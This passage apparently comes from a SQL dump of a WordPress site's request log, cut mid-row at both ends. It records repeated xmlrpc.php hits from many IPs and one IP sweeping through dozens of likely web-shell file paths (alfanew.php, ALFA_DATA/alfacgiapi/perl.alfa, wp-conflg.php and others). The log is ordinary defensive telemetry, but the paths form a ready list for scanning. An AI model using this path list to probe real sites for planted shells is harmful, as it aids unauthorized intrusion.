12:26:30'),(10099,'https://amb18b.com/xmlrpc.php','122.51.207.51','https://amb18b.com',1,'2025-11-24 12:30:47','2025-11-24 12:30:47'),(10100,'https://amb18b.com/xmlrpc.php','2400:6180:100:d0::acd2:4001','https://amb18b.com',1,'2025-11-24 12:34:53','2025-11-24 12:34:53'),(10101,'https://amb18b.com/xmlrpc.php','188.166.62.194','https://amb18b.com',1,'2025-11-24 12:39:10','2025-11-24 12:39:10'),(10102,'https://amb18b.com/xmlrpc.php','139.59.253.161','https://amb18b.com',1,'2025-11-24 12:43:25','2025-11-24 12:43:25'),(10103,'https://amb18b.com/xmlrpc.php','2a10:b5c1:122::1','https://amb18b.com',1,'2025-11-24 12:51:55','2025-11-24 12:51:55'),(10104,'https://amb18b.com/xmlrpc.php','158.170.66.237','https://amb18b.com',1,'2025-11-24 12:56:16','2025-11-24 12:56:16'),(10105,'https://amb18b.com/xmlrpc.php','47.238.97.17','https://amb18b.com',1,'2025-11-24 13:00:27','2025-11-24 13:00:27'),(10106,'https://amb18b.com/xmlrpc.php','18.229.229.99','https://amb18b.com',1,'2025-11-24 13:05:13','2025-11-24 13:05:13'),(10107,'https://amb18b.com/xmlrpc.php','159.223.34.195','https://amb18b.com',1,'2025-11-24 13:13:40','2025-11-24 13:13:40'),(10108,'https://amb18b.com/xmlrpc.php','128.199.163.66','https://amb18b.com',1,'2025-11-24 13:18:23','2025-11-24 13:18:23'),(10109,'https://amb18b.com/xmlrpc.php','151.80.151.56','https://amb18b.com',2,'2025-11-24 13:35:25','2025-11-24 13:22:39'),(10110,'https://amb18b.com/xmlrpc.php','45.151.61.12','https://amb18b.com',2,'2025-11-24 13:48:08','2025-11-24 13:26:53'),(10111,'https://amb18b.com/xmlrpc.php','14.192.25.106','https://amb18b.com',1,'2025-11-24 13:39:40','2025-11-24 13:39:40'),(10112,'https://amb18b.com/xmlrpc.php','2407:e3c0:0:66:be24:11ff:fe2e:3b02','https://amb18b.com',1,'2025-11-24 13:52:22','2025-11-24 13:52:22'),(10113,'https://amb18b.com/xmlrpc.php','2402:1f00:8100:400::d86','https://amb18b.com',1,'2025-11-24 13:56:36','2025-11-24 13:56:36'),(10114,'https://amb18b.com/xmlrpc.php','165.227.13.11','https://amb18b.com',1,'2025-11-24 14:00:55','2025-11-24 14:00:55'),(10115,'https://amb18b.com/xmlrpc.php','115.190.57.183','https://amb18b.com',1,'2025-11-24 14:05:16','2025-11-24 14:05:16'),(10116,'https://amb18b.com/xmlrpc.php','188.166.62.194','https://amb18b.com',1,'2025-11-24 14:09:31','2025-11-24 14:09:31'),(10117,'https://amb18b.com/xmlrpc.php','101.37.75.104','https://amb18b.com',1,'2025-11-24 14:13:52','2025-11-24 14:13:52'),(10118,'https://amb18b.com/xmlrpc.php','81.88.53.133','https://amb18b.com',1,'2025-11-24 14:18:03','2025-11-24 14:18:03'),(10119,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','52.191.198.92','Invalid Referrer',2,'2025-11-24 14:53:48','2025-11-24 14:20:35'),(10120,'https://amb18b.com/wp-plain.php','52.191.198.92','Invalid Referrer',2,'2025-11-24 14:53:49','2025-11-24 14:20:35'),(10121,'https://amb18b.com/','52.191.198.92','Invalid Referrer',4,'2025-11-24 14:53:55','2025-11-24 14:20:39'),(10122,'https://amb18b.com/alfacgiapi/perl.alfa','52.191.198.92','Invalid Referrer',2,'2025-11-24 14:53:55','2025-11-24 14:20:40'),(10123,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','52.191.198.92','Direct Access',2,'2025-11-24 14:53:56','2025-11-24 14:20:43'),(10124,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','52.191.198.92','Direct Access',2,'2025-11-24 14:54:00','2025-11-24 14:20:47'),(10125,'https://amb18b.com/xmlrpc.php','104.236.5.222','https://amb18b.com',1,'2025-11-24 14:22:16','2025-11-24 14:22:16'),(10126,'https://amb18b.com/xmlrpc.php','81.88.53.143','https://amb18b.com',1,'2025-11-24 14:26:31','2025-11-24 14:26:31'),(10127,'https://amb18b.com/xmlrpc.php','4.240.89.23','https://amb18b.com',1,'2025-11-24 14:30:46','2025-11-24 14:30:46'),(10128,'https://amb18b.com/xmlrpc.php','121.43.150.118','https://amb18b.com',1,'2025-11-24 14:35:03','2025-11-24 14:35:03'),(10129,'https://amb18b.com/xmlrpc.php','20.151.56.195','https://amb18b.com',1,'2025-11-24 14:43:34','2025-11-24 14:43:34'),(10130,'https://amb18b.com/xmlrpc.php','51.81.207.12','https://amb18b.com',1,'2025-11-24 14:56:09','2025-11-24 14:56:09'),(10131,'https://amb18b.com/xmlrpc.php','103.110.84.40','https://amb18b.com',1,'2025-11-24 15:00:24','2025-11-24 15:00:24'),(10132,'https://amb18b.com/xmlrpc.php','217.131.14.13','https://amb18b.com',1,'2025-11-24 15:04:45','2025-11-24 15:04:45'),(10133,'https://amb18b.com/acxx.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:10','2025-11-24 15:07:10'),(10134,'https://amb18b.com/dev1s.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:12','2025-11-24 15:07:12'),(10135,'https://amb18b.com/ww1.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:13','2025-11-24 15:07:13'),(10136,'https://amb18b.com/c4.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:15','2025-11-24 15:07:15'),(10137,'https://amb18b.com/wsx.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:17','2025-11-24 15:07:17'),(10138,'https://amb18b.com/b4.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:19','2025-11-24 15:07:19'),(10139,'https://amb18b.com/xenium4.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:21','2025-11-24 15:07:21'),(10140,'https://amb18b.com/xpw.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:22','2025-11-24 15:07:22'),(10141,'https://amb18b.com/ww2.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:24','2025-11-24 15:07:24'),(10142,'https://amb18b.com/ww3.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:26','2025-11-24 15:07:26'),(10143,'https://amb18b.com/v.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:28','2025-11-24 15:07:28'),(10144,'https://amb18b.com/d2.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:29','2025-11-24 15:07:29'),(10145,'https://amb18b.com/snus.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:32','2025-11-24 15:07:32'),(10146,'https://amb18b.com/011i.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:35','2025-11-24 15:07:35'),(10147,'https://amb18b.com/disaos.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:37','2025-11-24 15:07:37'),(10148,'https://amb18b.com/gdn.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:41','2025-11-24 15:07:41'),(10149,'https://amb18b.com/ww4.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:42','2025-11-24 15:07:42'),(10150,'https://amb18b.com/xc.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:46','2025-11-24 15:07:46'),(10151,'https://amb18b.com/g.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:48','2025-11-24 15:07:48'),(10152,'https://amb18b.com/nx1.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:50','2025-11-24 15:07:50'),(10153,'https://amb18b.com/ii.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:53','2025-11-24 15:07:53'),(10154,'https://amb18b.com/kr.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:56','2025-11-24 15:07:56'),(10155,'https://amb18b.com/18299.php','40.69.66.178','Direct Access',1,'2025-11-24 15:07:59','2025-11-24 15:07:59'),(10156,'https://amb18b.com/3.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:02','2025-11-24 15:08:02'),(10157,'https://amb18b.com/chati.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:04','2025-11-24 15:08:04'),(10158,'https://amb18b.com/content-over.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:05','2025-11-24 15:08:05'),(10159,'https://amb18b.com/gm.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:07','2025-11-24 15:08:07'),(10160,'https://amb18b.com/naxc.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:10','2025-11-24 15:08:10'),(10161,'https://amb18b.com/we.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:11','2025-11-24 15:08:11'),(10162,'https://amb18b.com/size.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:13','2025-11-24 15:08:13'),(10163,'https://amb18b.com/rsjlrria.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:16','2025-11-24 15:08:16'),(10164,'https://amb18b.com/wp-includes/customize/about.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:19','2025-11-24 15:08:19'),(10165,'https://amb18b.com/gec.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:21','2025-11-24 15:08:21'),(10166,'https://amb18b.com/update/gec.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:23','2025-11-24 15:08:23'),(10167,'https://amb18b.com/nfu.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:25','2025-11-24 15:08:25'),(10168,'https://amb18b.com/update/nfu.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:27','2025-11-24 15:08:27'),(10169,'https://amb18b.com/xl8.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:29','2025-11-24 15:08:29'),(10170,'https://amb18b.com/xl6.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:31','2025-11-24 15:08:31'),(10171,'https://amb18b.com/class-t.api.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:33','2025-11-24 15:08:33'),(10172,'https://amb18b.com/zc-706.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:36','2025-11-24 15:08:36'),(10173,'https://amb18b.com/gifclass.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:38','2025-11-24 15:08:38'),(10174,'https://amb18b.com/manager.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:40','2025-11-24 15:08:40'),(10175,'https://amb18b.com/.well-known/as.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:41','2025-11-24 15:08:41'),(10176,'https://amb18b.com/e56.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:45','2025-11-24 15:08:45'),(10177,'https://amb18b.com/wp-x.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:47','2025-11-24 15:08:47'),(10178,'https://amb18b.com/css.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:49','2025-11-24 15:08:49'),(10179,'https://amb18b.com/11.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:51','2025-11-24 15:08:51'),(10180,'https://amb18b.com/20.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:53','2025-11-24 15:08:53'),(10181,'https://amb18b.com/1.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:56','2025-11-24 15:08:56'),(10182,'https://amb18b.com/c.php','40.69.66.178','Direct Access',1,'2025-11-24 15:08:57','2025-11-24 15:08:57'),(10183,'https://amb18b.com/build.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:00','2025-11-24 15:09:00'),(10184,'https://amb18b.com/admin/upload/css.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:01','2025-11-24 15:09:01'),(10185,'https://amb18b.com/xmlrpc.php','208.109.32.191','https://amb18b.com',1,'2025-11-24 15:09:02','2025-11-24 15:09:02'),(10186,'https://amb18b.com/lock360.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:03','2025-11-24 15:09:03'),(10187,'https://amb18b.com/4.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:05','2025-11-24 15:09:05'),(10188,'https://amb18b.com/X7x.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:07','2025-11-24 15:09:07'),(10189,'https://amb18b.com/about.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:10','2025-11-24 15:09:10'),(10190,'https://amb18b.com/r.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:12','2025-11-24 15:09:12'),(10191,'https://amb18b.com/v4.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:15','2025-11-24 15:09:15'),(10192,'https://amb18b.com/wp-22.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:17','2025-11-24 15:09:17'),(10193,'https://amb18b.com/makeasmtp.php?p=','40.69.66.178','Direct Access',1,'2025-11-24 15:09:19','2025-11-24 15:09:19'),(10194,'https://amb18b.com/system_log.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:21','2025-11-24 15:09:21'),(10195,'https://amb18b.com/NewFile.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:22','2025-11-24 15:09:22'),(10196,'https://amb18b.com/t.php?p=','40.69.66.178','Direct Access',1,'2025-11-24 15:09:24','2025-11-24 15:09:24'),(10197,'https://amb18b.com/ee.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:26','2025-11-24 15:09:26'),(10198,'https://amb18b.com/2.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:28','2025-11-24 15:09:28'),(10199,'https://amb18b.com/6.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:30','2025-11-24 15:09:30'),(10200,'https://amb18b.com/12.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:32','2025-11-24 15:09:32'),(10201,'https://amb18b.com/0.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:33','2025-11-24 15:09:33'),(10202,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','40.69.66.178','Direct Access',1,'2025-11-24 15:09:35','2025-11-24 15:09:35'),(10203,'https://amb18b.com/02.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:37','2025-11-24 15:09:37'),(10204,'https://amb18b.com/w.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:39','2025-11-24 15:09:39'),(10205,'https://amb18b.com/go.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:41','2025-11-24 15:09:41'),(10206,'https://amb18b.com/an.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:42','2025-11-24 15:09:42'),(10207,'https://amb18b.com/wp.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:44','2025-11-24 15:09:44'),(10208,'https://amb18b.com/admin.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:46','2025-11-24 15:09:46'),(10209,'https://amb18b.com/admin.php?p=','40.69.66.178','Direct Access',1,'2025-11-24 15:09:48','2025-11-24 15:09:48'),(10210,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:50','2025-11-24 15:09:50'),(10211,'https://amb18b.com/index/function.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:52','2025-11-24 15:09:52'),(10212,'https://amb18b.com/wp-includes/ID3/rk2.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:53','2025-11-24 15:09:53'),(10213,'https://amb18b.com/license.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:55','2025-11-24 15:09:55'),(10214,'https://amb18b.com/radio.php','40.69.66.178','Direct Access',1,'2025-11-24 15:09:58','2025-11-24 15:09:58'),(10215,'https://amb18b.com/info.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:00','2025-11-24 15:10:00'),(10216,'https://amb18b.com/alfanew.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:02','2025-11-24 15:10:02'),(10217,'https://amb18b.com/inputs.php?p=','40.69.66.178','Direct Access',1,'2025-11-24 15:10:04','2025-11-24 15:10:04'),(10218,'https://amb18b.com/admin/function.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:08','2025-11-24 15:10:08'),(10219,'https://amb18b.com/wp-includes/assets/index.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:09','2025-11-24 15:10:09'),(10220,'https://amb18b.com/wp-admin/images/index.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:12','2025-11-24 15:10:12'),(10221,'https://amb18b.com/default.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:13','2025-11-24 15:10:13'),(10222,'https://amb18b.com/lv.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:15','2025-11-24 15:10:15'),(10223,'https://amb18b.com/marijuana.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:19','2025-11-24 15:10:19'),(10224,'https://amb18b.com/wp-includes/autoload_classmap.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:21','2025-11-24 15:10:21'),(10225,'https://amb18b.com/1.php?','40.69.66.178','Direct Access',1,'2025-11-24 15:10:27','2025-11-24 15:10:27'),(10226,'https://amb18b.com/marijuana.php?','40.69.66.178','Direct Access',1,'2025-11-24 15:10:28','2025-11-24 15:10:28'),(10227,'https://amb18b.com/about/function.php?','40.69.66.178','Direct Access',1,'2025-11-24 15:10:30','2025-11-24 15:10:30'),(10228,'https://amb18b.com/simple.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:32','2025-11-24 15:10:32'),(10229,'https://amb18b.com/goat1.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:34','2025-11-24 15:10:34'),(10230,'https://amb18b.com/chosen.php?','40.69.66.178','Direct Access',1,'2025-11-24 15:10:36','2025-11-24 15:10:36'),(10231,'https://amb18b.com/yanz.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:38','2025-11-24 15:10:38'),(10232,'https://amb18b.com/config.php?','40.69.66.178','Direct Access',1,'2025-11-24 15:10:41','2025-11-24 15:10:41'),(10233,'https://amb18b.com/network.php','40.69.66.178','Direct Access',1,'2025-11-24 15:10:42','2025-11-24 15:10:42'),(10234,'https://amb18b.com/wp-2019.php?','40.69.66.178','Direct Access',1,'